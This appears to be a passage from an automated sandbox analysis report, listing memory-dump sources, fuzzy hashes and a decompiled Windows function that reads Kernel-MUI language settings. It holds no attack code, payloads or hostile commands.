Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546

Uniqueness

Uniqueness Score: -1.00%

Function 008BFAB8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996

Uniqueness

Uniqueness Score: -1.00%

Function 008BFA20, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 008BFA50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986

Uniqueness

Uniqueness Score: -1.00%

Function 008BFBE8, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986

Uniqueness

Uniqueness Score: -1.00%

Function 008BFB50, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 008BFC30, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 008BFC48, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456

Uniqueness

Uniqueness Score: -1.00%

Function 008C0C40, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547

Uniqueness

Uniqueness Score: -1.00%

Function 008C1D80, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686

Uniqueness

Uniqueness Score: -1.00%

Function 008BFD5C, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 008BFE24, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456

Uniqueness

Uniqueness Score: -1.00%

Function 008BFFFC, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 008BFF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199790772.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199797290.00000000009A0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199803645.00000000009A4000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199809684.00000000009A7000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199815552.00000000009B0000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2199906185.0000000000A10000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 008E8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E008E8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E008E8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E008CE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E008E718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E008E8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E008E718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E008E8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E008E8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E008E8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E008E718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E008C2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008DE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E008CE2A8(_t322,  &_v68, _v16);
								if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008DE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E008CE2A8(_t322,  &_v68, _t236);
								if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E008E718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E008C2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008DE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E008CE2A8(_v12,  &_v68, _v16);
							if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008DE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E008CE2A8(_t322,  &_v68, _t269);
							if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E008E718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E008CE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E008C2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008DE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E008CE2A8(_v12,  &_v68, _v16);
						if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008DE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E008CE2A8(_t322,  &_v68, _t296);
						if(E008E5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E008CE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x008e8788
0x008e8788
0x008e8791
0x008e8794
0x008e8798
0x008e879b
0x008e879e
0x008e87a1
0x008e87a4
0x008e87a7
0x008e87aa
0x008e87af
0x00931ad3
0x008e8b0a
0x008e8b0d
0x008e8b13
0x008e8b19
0x008e8b1f
0x008e8b25
0x008e8b2b
0x008e8b31
0x008e8b37
0x008e8b3d
0x008e8b46
0x008e8b46
0x008e87c6
0x008e87d0
0x00931ae0
0x00931ae6
0x00931af8
0x00931af8
0x00931afd
0x00931afe
0x00931b01
0x00931b06
0x00931b06
0x008e87d6
0x008e87f2
0x008e87f7
0x008e8807
0x008e880a
0x008e880f
0x008e8810
0x008e8813
0x008e8818
0x008e8818
0x008e882c
0x008e8831
0x008e8838
0x008e8908
0x008e8920
0x008e89f0
0x008e8a08
0x008e8af6
0x008e8af6
0x008e8af8
0x008e8afb
0x00931beb
0x00931beb
0x008e8b04
0x00931bf8
0x00931c0e
0x00931c13
0x00931c16
0x00931c16
0x00931bf8
0x00000000
0x008e8b04
0x008e8a0e
0x008e8a11
0x008e8a14
0x008e8a15
0x008e8a18
0x008e8a22
0x008e8b59
0x008e8a28
0x008e8a3c
0x008e8a3c
0x008e8a42
0x00931bb0
0x00931b11
0x00931b11
0x00000000
0x008e8a48
0x008e8a51
0x008e8a5b
0x008e8a5e
0x008e8a61
0x008e8a69
0x008e8a69
0x008e8a6d
0x00000000
0x00000000
0x008e8a74
0x008e8a7c
0x008e8a7d
0x008e8a91
0x008e8a93
0x008e8a93
0x008e8a98
0x008e8a9b
0x008e8aa1
0x008e8aa1
0x008e8aa4
0x008e8aaa
0x008e8ab1
0x008e8ac5
0x008e8ac7
0x008e8ac7
0x008e8ac5
0x008e8ace
0x00931bc9
0x00931bce
0x00931bd2
0x00931bd2
0x008e8ad8
0x008e8aeb
0x008e8aeb
0x008e8af0
0x008e8af4
0x00000000
0x008e8af4
0x008e8a42
0x008e8926
0x008e8929
0x008e892c
0x008e892d
0x008e8930
0x008e8935
0x008e893a
0x008e8b51
0x008e8940
0x008e8954
0x008e8954
0x008e895a
0x00931b63
0x00000000
0x008e8960
0x008e8969
0x008e8973
0x008e8976
0x008e8979
0x008e897e
0x008e8981
0x008e8981
0x008e8986
0x00000000
0x00000000
0x00931b6e
0x00931b74
0x00931b7b
0x00931b8f
0x00931b91
0x00931b91
0x00931b99
0x00931b9c
0x00931ba2
0x00931ba2
0x008e898c
0x008e8992
0x008e8999
0x008e89ad
0x00931ba8
0x00931ba8
0x008e89ad
0x008e89b6
0x008e89c8
0x008e89cd
0x008e89d0
0x008e89d0
0x008e89d6
0x008e89e8
0x008e89e8
0x008e89ed
0x00000000
0x008e89ed
0x008e895a
0x008e883e
0x008e8841
0x008e8844
0x008e8845
0x008e8848
0x008e884d
0x008e8852
0x008e8b49
0x008e8858
0x008e886c
0x008e886c
0x008e8872
0x00931b0e
0x00000000
0x008e8878
0x008e8881
0x008e888b
0x008e888e
0x008e8891
0x008e8896
0x008e8899
0x008e8899
0x008e889e
0x00000000
0x00000000
0x00931b21
0x00931b27
0x00931b2e
0x00931b42
0x00931b44
0x00931b44
0x00931b4c
0x00931b4f
0x00931b55
0x00931b55
0x008e88a4
0x008e88aa
0x008e88b1
0x008e88c5
0x00931b5b
0x00931b5b
0x008e88c5
0x008e88ce
0x008e88e0
0x008e88e5
0x008e88e8
0x008e88e8
0x008e88ee
0x008e8900
0x008e8900
0x008e8905
0x00000000
0x008e8905

APIs

_wcspbrk.LIBCMT ref: 008E8891
_wcspbrk.LIBCMT ref: 008E8979
_wcspbrk.LIBCMT ref: 008E8A61
_wcspbrk.LIBCMT ref: 008E8A9B
_wcspbrk.LIBCMT ref: 00931B9C

Strings

Kernel-MUI-Language-Disallowed, xrefs: 008E8914
WindowsExcludedProcs, xrefs: 008E87C1
Kernel-MUI-Language-SKU, xrefs: 008E89FC
Kernel-MUI-Language-Allowed, xrefs: 008E8827
Kernel-MUI-Number-Allowed, xrefs: 008E87E6

Memory Dump Source

Source File: 00000007.00000002.2199608978.00000000008B0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000007.00000002.2199601831.00000000008A0000.00000040.00000001.sdmp Download File
